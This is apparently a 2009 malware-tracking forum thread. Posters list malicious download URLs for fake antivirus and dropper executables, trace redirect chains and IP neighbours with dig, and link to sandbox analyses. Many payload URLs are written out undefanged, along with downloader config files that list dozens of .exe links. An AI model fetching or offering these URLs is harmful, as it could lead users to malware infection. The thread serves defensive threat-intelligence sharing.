Malware Domain List

Malware Related => Malicious Domains => Topic started by: Mr Clean on March 28, 2009, 03:38:47 pm

Title: Mr Clean's dirt
Post by: Mr Clean on March 28, 2009, 03:38:47 pm
Code: [Select]
http://download.av-best.info/install.php?campaign=mmb_3593020743&country=en&counter=0&campaign=mmb_3593020743&landid=4
Referer: http://scanner.av-best.info/scan.php?campaign=mmb_3593020743&landid=4


Downloads a file called AntiVirusInstaller.exe

http://www.virustotal.com/analisis/7a63e24b4f5b13ea8f13c4ddeeb467f2
http://www.threatexpert.com/report.aspx?md5=8d7463acc24e8bcb5c569d0ad2a23dba
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 12:42:29 pm
Code: [Select]
http://dwnld.promotion-offer.com/secure/d3176d39144e0a6fc93c2a7d3f0b4471/49d0bb49/srm/srm_free_setup.exe

http://www.virustotal.com/analisis/7a0fe250cb4f063ccb32089f240842f6
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 07:31:18 pm
It all starts here:
Code: [Select]
GET: http://pnfzetnax.nethttp://pnfzetnax.net/est/ HTTP/1.1"

Referrer: http://media2.mediafileshost.com/images/5516_562850_7444899_250_300.swf?clickTAG=http%3A//12.47.196.61/ct.jsp%3Fp%3D112801%26appid%3D32255%2"


SRC: GET /est/ HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: UA-CPU: x86
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
SRC: Host: pnfzetnax.net
SRC: Connection: Keep-Alive
SRC:
SRC:
DST: HTTP/1.1 302 Found
DST: Server: nginx/0.6.32
DST: Date: Mon, 30 Mar 2009 19:13:38 GMT
DST: Content-Type: text/html
DST: Transfer-Encoding: chunked
DST: Connection: close
DST: Set-Cookie: SL_25_0000=_1_; domain=webstatsmaster.com; path=/; expires=Tue, 31-Mar-2009 19:13:18 GMT
DST: Location: http://67.215.246.138/aff56.php

to download this nice pdf:

Code: [Select]
http://67.215.246.138/a9/pdf.php?u=i_7_0

http://www.virustotal.com/analisis/9e90711ccbb0a0d013a02094d5773fca
http://wepawet.iseclab.org/view.php?hash=7bff4ce3676fc2e12093b0791c1d0c9e&t=1238220458&type=js

immediately followed by this goodie:

Code: [Select]
http://67.215.246.138/a9/aff_9.exe?u=i_7_0&spl=p1

http://www.virustotal.com/analisis/030c906429c51e38b75bda1f15eee8f8
http://www.threatexpert.com/report.aspx?md5=264c543ac609726837815a398f1ea8df

Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 30, 2009, 11:18:24 pm
Code: [Select]
http://www.pornoget.info/sexnew22ii/browser-video-object2.exe

http://www.virustotal.com/analisis/ce4512e7c219df07a0bb85f42547ec67
http://www.threatexpert.com/report.aspx?md5=16b7227d021f7f7073b50ae8769ea7f1
http://anubis.iseclab.org/?action=result&task_id=17734c4d20134fd0405ac17ef81bbfdee&format=html
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on March 31, 2009, 12:11:37 am
Nice one, cheers :)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 01:12:03 pm
Nice one, cheers :)

thanks. 

I like what you guys/gals have going here.   

More dirt, without a doubt, is on it's way.   
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:09:45 pm
This domain isn't unknown but here's more evidence of it's bad behaviour

Code: [Select]
http://i1match361.biz/file/2440/f8ae8aedaf494548b681dedb37dd3d5f/0.exe.bak

http://www.virustotal.com/analisis/ddbc6d82836afea549062340220fed9c
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:45:33 pm
Code: [Select]
http://loyaldown99.com/codec/259.exe

http://www.virustotal.com/analisis/81af29e6474cebea18f2d20bb94ba75d
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 03:50:33 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

downloads install.exe

http://www.virustotal.com/analisis/de2069149077bdac0ddb6ebb497d4e64
http://www.threatexpert.com/report.aspx?md5=319d046a673a0f50652b9e2884233dd6

BTW, there is an important lesson here, NEVER EVER trust DNS PTR records.  PTR record says it's google.com

Code: [Select]
$ dig ultracleaner.biz +short
84.16.227.222
$ dig -x 84.16.227.222 +short
84-16-227-222.google.com.
Title: Re: Mr Clean's dirt
Post by: SysAdMini on March 31, 2009, 09:07:33 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

http://www.malwaredomainlist.com/mdl.php?search=84.16.227.222&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 09:10:41 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

http://www.virustotal.com/analisis/b43af6ab6de8c91f32f3b8c16a90aedf
http://anubis.iseclab.org/?action=result&task_id=1125842cb5bf63b246558583f1fddf282
http://www.threatexpert.com/report.aspx?md5=8ab1ad490a65ea907848b8f5b2aa6682
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 09:16:51 pm
Code: [Select]
http://ultracleaner.biz/download.php?affid=02935

http://www.malwaredomainlist.com/mdl.php?search=84.16.227.222&colsearch=All&quantity=50


very nice!   8) 

Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 10:06:02 pm
Code: [Select]
http://files.ms-load-av.com/exe/setup_200002.exe

http://www.virustotal.com/analisis/31bb622ca5445fec193f60b305e58c5a
http://anubis.iseclab.org/?action=result&task_id=10b1ad77a3cbfc184b9054b5775669955
Title: Re: Mr Clean's dirt
Post by: SysAdMini on March 31, 2009, 10:44:09 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

Code: [Select]
frg-softwares.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on March 31, 2009, 11:17:52 pm
Code: [Select]
http://kol-development.com/viewtubesoftware.40019.exe

Code: [Select]
frg-softwares.com/viewtubesoftware.40019.exe

Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 01, 2009, 06:20:18 am
Code: [Select]
somefilesportalnow.com/viewtubesoftware.40019.exe
freeportalsoftwarenow.com/viewtubesoftware.40019.exe
sim-softportal.com/viewtubesoftware.40019.exe
dnk-softwares.com/viewtubesoftware.40019.exe
get-softwares.com/viewtubesoftware.40019.exe
glk-softportal.com/viewtubesoftware.40019.exe
glock-softwares.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 01, 2009, 11:21:55 am
Code: [Select]
contr-softportal.com/viewtubesoftware.40019.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 01, 2009, 06:28:54 pm
Code: [Select]
http://zaq-softwares.com/viewtubesoftware.40016.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 12:51:49 am
Code: [Select]
http://files.load-pro-as.com/normal/setup_11038_3_1.exe

http://www.virustotal.com/analisis/d18a9838ad447ca5cdfb2ad761929f6d
http://anubis.iseclab.org/?action=result&task_id=164f1f17545de8e640522289457507627
http://www.threatexpert.com/report.aspx?md5=701353926e8d4c3f0d10843c297680fe

http://www.malwaredomainlist.com/mdl.php?search=78.26.179.232&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 09:45:56 am
Code: [Select]
hxxp://85.17.238.145/1701/1.php

http://www.virustotal.com/analisis/f0162b1c2188c1335ab6bc2adc94cf68
http://anubis.iseclab.org/?action=result&task_id=193ed14a441ac2ad4d19ed742e2386e5e
http://www.threatexpert.com/report.aspx?md5=62f8dcb15321c33fa999cd087bbef1cf
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 02, 2009, 10:40:25 am
Code: [Select]
http://files.load-pro-as.com/normal/setup_11038_3_1.exe

http://www.virustotal.com/analisis/d18a9838ad447ca5cdfb2ad761929f6d
http://anubis.iseclab.org/?action=result&task_id=164f1f17545de8e640522289457507627
http://www.threatexpert.com/report.aspx?md5=701353926e8d4c3f0d10843c297680fe

Files have already been modified.

http://www.virustotal.com/analisis/44af4959e7409ddc649e63731075ccfd 2/38
http://www.threatexpert.com/report.aspx?md5=2f9a0708edd929fd76019b86fa45f702
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 04:05:08 pm
Code: [Select]
hxxp://sendspace-usa.net/sur4you.exe

http://www.virustotal.com/analisis/66933d74a2ca3ffca1742cbcd5c1c08c
http://www.threatexpert.com/report.aspx?md5=295e55e662d21f42596972924a74db37
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 02, 2009, 05:58:40 pm
Code: [Select]
hxxp://sendspace-usa.net/sur4you.exe

http://www.virustotal.com/analisis/66933d74a2ca3ffca1742cbcd5c1c08c
http://www.threatexpert.com/report.aspx?md5=295e55e662d21f42596972924a74db37


Doesn't resolve here. Can you give me the ip ? I'm experiencing dns problems at the moment when I try to resolve .net domains.
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 02, 2009, 06:12:09 pm
IP was 196.2.198.241 - it's not resolving atm

/edit

Others on the same IP;

Code: [Select]
egns.vg
www.egns.vg
ns1.egns.vg
bankofoscotland.co.uk
thelegion74.com
love-true.com
thronofodin.com
throbilskirnir.com
good1soft.com
great2008x.com
ustechservic.com.cn
vse4you.info
wwwfbcdn.net
cd-soft.net
thefreecompany.net
googgle.su
yanndex.su
sendspace.com.bz
yourbestpartners.biz

Though Domain Tools says there's 65 on there (and the guy that owns sendspace-usa.net apparently owns 63 domains - and I'm betting they're likely on the same IP)

/edit

http://hosts-file.net/misc/hpObserver_-_egns.vg.html

There's also 196.2.198.240, 196.2.198.242, 196.2.198.243 and 196.2.198.252

http://hosts-file.net/?s=196.2.198.242

Related to;

http://www.bobbear.co.uk/delivery-solutions-inc.html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 02, 2009, 10:13:59 pm
Code: [Select]
hxxp://yourguardpro.cn/installer_90001.exe
http://www.virustotal.com/analisis/0ca99080d7252f55aac81c78f032ee5f
http://www.threatexpert.com/report.aspx?md5=23cb553ce604959f3d39575813d8d48b

http://www.malwaredomainlist.com/mdl.php?search=94.247.2.215&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 03, 2009, 09:56:21 pm
Code: [Select]
hxxp://ads.belointeractive.com/RealMedia/ads/Creatives/OasDefault/NtlRhapsodyYourDirectMedia001A/NtlRhapsodyYourDirectMedia001A728_031309.sw

redirects to

hxxp://67.215.246.138/aff78.php

resulting in Javascript exploit
http://wepawet.iseclab.org/view.php?hash=90716496443a946525b818ba6cb543b4&t=1238794860&type=js

PDF exploit
http://wepawet.iseclab.org/view.php?hash=165d794ac5138a1b586290f99172a98d&type=js

binary download1
http://www.virustotal.com/analisis/673490b4fcaa59507417b1d2a7d98d72
http://www.threatexpert.com/report.aspx?md5=5bd1e08e230abe020b10f220f8448e61

binary download2
http://www.virustotal.com/analisis/d14457c38b639542a68b256b4abad3da
http://www.threatexpert.com/report.aspx?md5=4c5acab9968bca8e88fb9e193d598a7a

you know, train-wreck.
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 04, 2009, 04:50:21 am
Code: [Select]
hxxp://find-365.com/pages/make-pictures
hxxp://best-tube-home.com/200073/scan/
hxxp://files.ms-loads-av.com/exe/setup_200073_1_1.exe
hxxp://files.ms-loads-av.com/ -> spawns exe...
hxxp://files.ms-loads-av.com/exe/setup_200073_2_1.exe
hxxp://files.ms-loads-av.com/exe/setup_1_2_1.exe

find-365.com is the most interesting (to me at least),as it's hosted in more than one ip addresses...
http://www.bfk.de/bfk_dnslogger.html?query=find-365.com#result

Code: [Select]
hxxp://mycigarworld.info/in.cgi?16
hxxp://greatvirusscan.com/index.php?affid=10700
hxxp://greatvirusscan.com/download.php?affid=10700  -> spawns exe...

Code: [Select]
hxxp://tds.ibestadult.info/in?4
hxxp://mega-antiviral-ms.com/200073/scan/
hxxp://files.ms-loads-av.com/exe/setup_200073_1_1.exe

Code: [Select]
hxxp://webprotectionscan.com/download.php?affid=00000
hxxp://zoosexvideo.net/movie352.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 04, 2009, 11:43:40 am
find-365.com is the most interesting (to me at least),as it's hosted in more than one ip addresses...
http://www.bfk.de/bfk_dnslogger.html?query=find-365.com#result

I agree, quite interesting.

61.235.117.88   #       SHENZHEN        CHINA
72.167.121.94   #       LOS ANGELES     UNITED STATES
88.214.200.60   #       -       UNITED KINGDOM
92.62.101.47    #       TALLINN ESTONIA

2 of these IP's have already been reported

http://www.malwaredomainlist.com/mdl.php?search=72.167.121.94&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.214.200.60&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 04, 2009, 05:43:09 pm
Quote
hxxp://ourbestsearch.info/in.cgi?4
hxxp://adult-tube-downloads.net/promo3/?aid=330
hxxp://adult-tube-downloads.net/promo3/get.php?aid=330&vname=protect
http://www.virustotal.com/analisis/5a58f3c0fc68a1a71ced42ac568936e8
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 06, 2009, 05:37:12 am
Quote
hxxp://bestguideinc.net/search.php?qq=    ---> the .js redirector...
hxxp://www.spywareisolator2008.com/landing/?wmid=mirex    ---> spawns fake av exe...

Quote
hxxp://antivirus-av-ms-checker.com/200073/scan/
hxxp://files.download-av-ms.com/exe/setup_200073_1_1.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 02:39:55 pm
Code: [Select]
http://chezswing.com/jr/prop5.jpg

when is a jpg not a jpeg?
$ file prop5.jpg
prop5.jpg: PE executable for MS Windows (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/58ba1e765843fc145cfcd922852f44ba
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 04:33:15 pm
Code: [Select]
hxxp://buidnote.com/nates/?h=9ag0?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170

FYI Referrer was : http://ads.svx.adbrite.com/adserver/display_iab_ads.php?

http://www.virustotal.com/analisis/a3e53d33dd932f6a03fa227527201ffd
http://anubis.iseclab.org/?action=result&task_id=1d6b8b07b6f467394215282c531f2e5d6
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 06:12:13 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


http://www.virustotal.com/analisis/4f2e05693c24f10f714faba2295f9f4b
http://anubis.iseclab.org/?action=result&task_id=1aef76ba4318b1dd455f0eddf12bbf514


It looks like easter-egg-design-funny.diwyze.net lives in one of *those* neighbourhoods, look what lives just 2 doors down
http://www.malwaredomainlist.com/mdl.php?search=206.51.236&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:06:50 pm
Code: [Select]
hxxp://www.sftcp.cn/qy.exe
same file different name
hxxp://www.sftcp.cn/tt.exe

http://www.virustotal.com/analisis/3ecb2e67a01872eef56442a3a01e7ea0
http://www.threatexpert.com/report.aspx?md5=966240056a38ac41c9f923ff251600a1


Code: [Select]
$ dig www.sftcp.cn +short
qqaa.9966.org.                 <--  gee that look's familiar
121.14.154.4
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 06, 2009, 07:15:32 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:24:31 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064


Code: [Select]
$ dig inetsecuritycenter.com +short
209.44.126.14    <---   has been on my naught list for quite some time now

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 07:39:26 pm
Code: [Select]
hxxp://79.117.131.32/pid=12100/type=videxp/setup.exe

Referrer = http://easter-egg-design-funny.diwyze.net/


There are more easter eggs.

When I look at

Code: [Select]
easter-egg-design-funny.diwyze.net/scripts.js
there is an obfuscated iframe to

Code: [Select]
zodune.info/search.php?q=easter+egg+design+funny
redirects to

Code: [Select]
inetsecuritycenter.com/index.php?c=0&e=0&affid=08064


Code: [Select]
$ dig inetsecuritycenter.com +short
209.44.126.14    <---   has been on my naught list for quite some time now

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Oh goodie, PDF's too!!!!
Code: [Select]
http://79.117.131.32/pid=12100/type=videxp/spl/pdf.pdf

I can't download it now but the intent is implied.

ok, let's throw some dirt over top of this one and call it dead

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 06, 2009, 08:45:45 pm
Code: [Select]
http://www.yutergfrg.cn/1.exe
http://www.virustotal.com/analisis/d61c4992c075cf3f164907a3f08b8aa4

Code: [Select]
http://www.asdfgsdfgsdf.cn/0330.exe
http://www.virustotal.com/analisis/0b26015cbfd6f1b00299cd5dedeefd38

Code: [Select]
http://www.arhjfgjdrf.cn/new.txt

contains:
open=y
url1= http://www.yutergfrg.cn/1.exe
url2= http://www.yutergfrg.cn/2.exe
url3= http://www.yutergfrg.cn/3.exe
url4= http://www.yutergfrg.cn/4.exe
url5= http://www.yutergfrg.cn/5.exe
url6= http://www.yutergfrg.cn/6.exe
url7= http://www.yutergfrg.cn/7.exe
url8= http://www.yutergfrg.cn/8.exe
url9= http://www.yutergfrg.cn/9.exe
url10= http://www.yutergfrg.cn/10.exe
url11= http://www.yutergfrg.cn/11.exe
url12= http://www.yutergfrg.cn/12.exe
url13= http://www.yutergfrg.cn/13.exe
url14= http://www.yutergfrg.cn/14.exe
url15= http://www.yutergfrg.cn/15.exe
url16= http://www.yutergfrg.cn/16.exe
url17= http://www.yutergfrg.cn/17.exe
url18= http://www.yutergfrg.cn/18.exe
url19= http://www.yutergfrg.cn/19.exe
url20= http://www.yutergfrg.cn/20.exe
url21= http://www.yutergfrg.cn/21.exe
url22= http://www.yutergfrg.cn/22.exe
url23= http://www.yutergfrg.cn/23.exe
url24= http://www.yutergfrg.cn/24.exe
url25= http://www.yutergfrg.cn/25.exe
url26= http://www.yutergfrg.cn/26.exe
url27= http://www.yutergfrg.cn/27.exe
url28= http://www.yutergfrg.cn/28.exe
url29= http://www.yutergfrg.cn/29.exe
url30= http://www.yutergfrg.cn/30.exe
url31= http://www.yutergfrg.cn/31.exe
url32= http://www.yutergfrg.cn/32.exe
url33= http://www.yutergfrg.cn/33.exe
url34= http://www.yutergfrg.cn/34.exe
url35= http://www.yutergfrg.cn/35.exe

Code: [Select]
$ dig www.asdfgsdfgsdf.cn +short
222.186.25.35

$ dig www.yutergfrg.cn +short
222.186.25.35

$ dig www.arhjfgjdrf.cn +short
222.186.25.35

$ dig www.yutergfrg.cn +short
222.186.25.35


http://www.bfk.de/bfk_dnslogger.html?query=222.186.25.35
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:07:11 pm
Code: [Select]
hxxp://dsafsa.daslxzcewralrocjn.cn/9.exe

$ dig dsafsa.daslxzcewralrocjn.cn +short
222.76.210.14

http://www.virustotal.com/analisis/460816a185773ade10a3bb04645f2c3f
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:10:59 pm
Code: [Select]
http://www.999mimi.net/QvodSetup3.exe

$ dig www.999mimi.net +short
208.98.13.131

http://www.virustotal.com/analisis/df61e99e65c43ec29c2eb1d91f72642c
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 06:12:56 pm
Code: [Select]
http://www.991uu.net/97fbq.exe

$ dig www.991uu.net +short
208.98.4.100

http://www.virustotal.com/analisis/df61e99e65c43ec29c2eb1d91f72642c
Title: Re: Mr Clean's dirt
Post by: sowhat-x on April 07, 2009, 06:46:51 pm
Quote
Code:

hxxp://dsafsa.daslxzcewralrocjn.cn/9.exe

$ dig dsafsa.daslxzcewralrocjn.cn +short
222.76.210.14

http://www.virustotal.com/analisis/460816a185773ade10a3bb04645f2c3f
Now the guy who came up with this one,should really be something special...this sample certainly represents a unique case of ultimate stupidity.
Haven't properly analysed it as i'm not in front of a vm in the moment,i merely extracted the svchostr.exe and unpacked it...the results at VirusTotal:
http://www.virustotal.com/analisis/715b9f20ecd3b61ecfec3cd9f6c85f4e
So why the heck did he put himself in so much trouble in the first place...only god knows,lmao....  :D

Here's the Anubis report as well:
http://anubis.iseclab.org/?action=result&task_id=12c7b74b4f8f197e4618d48d794c1802a&format=html
Quote
9.buzhidaoganshenmeyong.cn/bGetIp.aspx  -> GET
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx  -> POST
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 07, 2009, 07:22:33 pm
ction=result&task_id=12c7b74b4f8f197e4618d48d794c1802a&format=html
Quote
9.buzhidaoganshenmeyong.cn/bGetIp.aspx  -> GET
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx  -> POST

Look at

Code: [Select]
9.buzhidaoganshenmeyong.cn/BaiduClickerClient.asmx
it gives you some functions.
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 10:46:05 pm
Code: [Select]
http://fullandtotalsecurity.com/js/jquery.js
http://fullandtotalsecurity.com/js/jquery-init.js
http://fullandtotalsecurity.com/images/alert.gif
http://fullandtotalsecurity.com/js/flist.js
http://fullandtotalsecurity.com/images/page_progressbar.gif
http://fullandtotalsecurity.com/images/i5000000.gif
http://fullandtotalsecurity.com/images/i1000000.gif
http://fullandtotalsecurity.com/images/i7000000.gif
http://fullandtotalsecurity.com/images/hdd.gif
http://fullandtotalsecurity.com/images/inf20000.gif
http://fullandtotalsecurity.com/images/i3000000.gif
http://fullandtotalsecurity.com/images/i4000000.gif
http://fullandtotalsecurity.com/images/qicon.gif
http://fullandtotalsecurity.com/images/window1.gif
http://fullandtotalsecurity.com/images/box_top_.gif
http://fullandtotalsecurity.com/images/progressbar.gif
http://fullandtotalsecurity.com/images/progressbar_green.gif
http://fullandtotalsecurity.com/images/hrline.gif
http://fullandtotalsecurity.com/images/i6000000.gif
http://fullandtotalsecurity.com/images/folder.gif

this one downloads the goodie
http://fullandtotalsecurity.com/download.php?affid=08043

$ dig fullandtotalsecurity.com +short
209.44.126.14


lot's of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

http://www.virustotal.com/analisis/b4ac2c66ddafca750b6adb7b0f4df84b
http://anubis.iseclab.org/?action=result&task_id=1173a2eece2951344a55bceade7e243a5

Code: [Select]
http://fullandtotalsecurity.com/install/ws.zip

$ unzip ws.zip
Archive:  ws.zip
  inflating: av.exe                 
  inflating: av.glu               
http://anubis.iseclab.org/?action=result&task_id=1f28d0fb468064264e118044b82e88cd4

http://www.virustotal.com/analisis/34ced6dce2a472fb933b738f735be320
http://www.virustotal.com/analisis/51a3c3ca22b080655c2332e8e06e5636


Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 07, 2009, 11:14:37 pm
lot's of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

BFK must be out of date - most of those seem to be failing to resolve atm;

http://hosts-file.net/misc/hpObserver_-_209.44.126.14.html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 11:20:25 pm
lot's of familiar family members
http://www.bfk.de/bfk_dnslogger.html?query=209.44.126.14

BFK must be out of date - most of those seem to be failing to resolve atm;

http://hosts-file.net/misc/hpObserver_-_209.44.126.14.html

[arnold voice]
they'll be back
[/arnold voice]
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on April 07, 2009, 11:28:02 pm
hehe no doubt ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 07, 2009, 11:54:49 pm
Code: [Select]
http://w1.iioo4567.com/01/e1.exe

$ dig w1.iioo4567.com +short
121.12.169.219

hmmmmmm...   siblings?
http://www.bfk.de/bfk_dnslogger.html?query=121.12.169.219

yup!
http://www.malwaredomainlist.com/mdl.php?search=121.12.169&colsearch=All&quantity=50

http://www.virustotal.com/analisis/90d37a91afd8a026b22de631f92fcbbd 23/40
http://anubis.iseclab.org/?action=result&task_id=1a89a3bb88444d3d4b5243a8d2f37bd8e
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 08, 2009, 05:40:54 pm
Code: [Select]
http://sendspace-us.com/surprise.exe

$ dig sendspace-us.com +short
196.2.198.241

http://virscan.org/report/65f54287fe50f4dec91a8e88986caa44.html   6/37
http://anubis.iseclab.org/?action=result&task_id=19856b42401d5af445d48e65c3a14f597

http://www.malwaredomainlist.com/mdl.php?search=196.2.198.241&colsearch=All&quantity=50

http://wepawet.iseclab.org/view.php?hash=8b4f9374e903acb4919b2e79babed892&t=1239213842&type=js


From above iseclab.org link
Code: [Select]
http://sendsurprise.com/load.php

$ dig sendsurprise.com +short
196.2.198.241

http://www.bfk.de/bfk_dnslogger.html?query=196.2.198.241#result
http://www.malwaredomainlist.com/mdl.php?search=196.2.198.241&colsearch=All&quantity=50



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:24:54 pm
Code: [Select]
http://xz1.177bt.com/qvod.exe

http://www.virustotal.com/analisis/9541efbef70b238de0cb7f511b96f62c 28/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:36:51 pm
Code: [Select]
$ curl http://g.uye123.com/01/fz.txt
1:http://u8.wgcn8.com/sb/ok.exe
1:http://u1.wgcn8.com/la/L1.exe
1:http://u1.wgcn8.com/la/L2.exe
1:http://u1.wgcn8.com/la/L4.exe
1:http://u1.wgcn8.com/la/L7.exe
1:http://u1.wgcn8.com/la/L6.exe
1:http://u3.wgcn8.com/lm/S8.exe
1:http://u3.wgcn8.com/lm/S1.exe
1:http://u3.wgcn8.com/lm/S10.exe
1:http://u3.wgcn8.com/lm/S2.exe
1:http://u3.wgcn8.com/lm/S12.exe
1:http://u3.wgcn8.com/lm/S14.exe
1:http://u3.wgcn8.com/lm/S15.exe
1:http://u3.wgcn8.com/lm/S16.exe
1:http://u3.wgcn8.com/lm/S11.exe
1:http://u7.wgcn8.com/cj/a1.exe
1:http://u2.wgcn8.com/gz/G1.exe
1:http://u2.wgcn8.com/gz/G5.exe
1:http://u2.wgcn8.com/gz/G4.exe
1:http://u2.wgcn8.com/gz/G39.exe
1:http://u2.wgcn8.com/gz/G33.exe
1:http://u2.wgcn8.com/gz/G25.exe
1:http://u2.wgcn8.com/gz/G35.exe
1:http://u2.wgcn8.com/gz/G37.exe
1:http://u2.wgcn8.com/gz/G15.exe
1:http://u2.wgcn8.com/gz/G9.exe
1:http://u2.wgcn8.com/gz/G24.exe
1:http://u2.wgcn8.com/gz/G21.exe
1:http://u2.wgcn8.com/gz/G29.exe
1:http://u2.wgcn8.com/gz/G23.exe
1:http://u2.wgcn8.com/gz/G22.exe
1:http://u4.wgcn8.com/gb/B7.exe
1:http://u9.wgcn8.com/cj/a2.exe
1:http://u9.wgcn8.com/cj/a10.exe
1:http://u9.wgcn8.com/cj/a6.exe
1:http://u7.wgcn8.com/cj/a9.exe
1:http://u7.wgcn8.com/cj/csj.exe
1:http://u7.wgcn8.com/cj/a8.exe
1:http://u8.wgcn8.com/sb/01.exe

gee lemme guess

http://www.virustotal.com/analisis/1ac067475424076ea1a0255875469c18 29/40

yada yada yada

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 09, 2009, 10:53:32 pm
Code: [Select]
http://securedantivirusonlinescanner.com/download/Install_2003-2.exe

$ dig securedantivirusonlinescanner.com +short
89.149.235.192

http://virscan.org/report/cd19a65865d37045e846c498107a3a82.html  4/37
http://www.virustotal.com/analisis/bad07c253de49cc66c5ac1d133054e18 4/40

http://anubis.iseclab.org/?action=result&task_id=1404bfc3a7ac5a5842199e7094bcf1353

makes a call to
Code: [Select]
http://securedliveuploads.com/?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18

$ dig securedliveuploads.com +short
89.149.235.192
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 11, 2009, 11:39:39 am
Code: [Select]
$ curl hxxp://www.dfhjmfgergfds.cn/new.txt
[file]
open=y
url1= hxxp://www.cvbnmdgesc.cn/1.exe
url2= hxxp://www.cvbnmdgesc.cn/2.exe
url3= hxxp://www.cvbnmdgesc.cn/3.exe
url4= hxxp://www.cvbnmdgesc.cn/4.exe
url5= hxxp://www.cvbnmdgesc.cn/5.exe
url6= hxxp://www.cvbnmdgesc.cn/6.exe
url7= hxxp://www.cvbnmdgesc.cn/7.exe
url8= hxxp://www.cvbnmdgesc.cn/8.exe
url9= hxxp://www.cvbnmdgesc.cn/9.exe
url10= hxxp://www.cvbnmdgesc.cn/10.exe
url11= hxxp://www.cvbnmdgesc.cn/11.exe
url12= hxxp://www.cvbnmdgesc.cn/12.exe
